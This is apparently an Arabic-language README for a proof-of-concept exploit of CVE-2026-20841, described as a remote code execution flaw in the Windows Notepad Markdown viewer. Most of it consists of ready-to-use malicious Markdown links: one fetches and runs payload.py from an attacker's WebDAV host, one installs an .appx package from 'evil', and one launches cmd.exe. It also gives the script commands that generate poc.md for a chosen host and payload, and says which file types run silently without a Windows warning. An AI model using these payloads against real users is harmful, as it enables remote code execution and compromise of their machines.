
إثبات مفهوم لاستغلال CVE-2026-20841، وهو ثغرة تنفيذ برمجيات عن بُعد (RCE) في مفكرة ويندوز عبر روابط ماركداون. يُنشئ ملفات .md مصمّمة خصيصًا لتفعيل حمولات عن بُعد، أو تحميل جانبي للتطبيقات، أو تنفيذ ملفات ثنائية محلية.
إثبات مفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية عن بُعد في عارض Markdown الخاص بمفكرة Windows. لا يقيّد محرك Markdown بروتوكولات URL، مما يسمح بتشغيل معالجات البروتوكولات التعسفية عبر روابط قابلة للنقر.
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
يحل بروتوكول file:/// مسارات UNC البعيدة. اربط حمولة وسيقوم Windows بجلبها وتنفيذها عند النقر.
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
يفتح مثبّت التطبيقات مع حزمة .appx/.msix مقدمة من المهاجم.
file://)[click](file://C:/windows/system32/cmd.exe)
يشغّل أي ملف قابل للتنفيذ موجود على القرص — cmd.exe، powershell.exe، mshta.exe، إلخ.
ينشئ كلا السكربتين ملف poc.md يحتوي على رابط مصمم في الدليل الحالي.
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# مثال
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
اختبر الحمولات في payloads/.
.exe، .lnk، .vbs وما شابهها تُطلق تحذير أمان من Windows بغض النظر عن سلوك المفكرة..py و .jar بصمت إذا كان Python أو Java مثبتًا على الهدف.ابقَ آمنًا!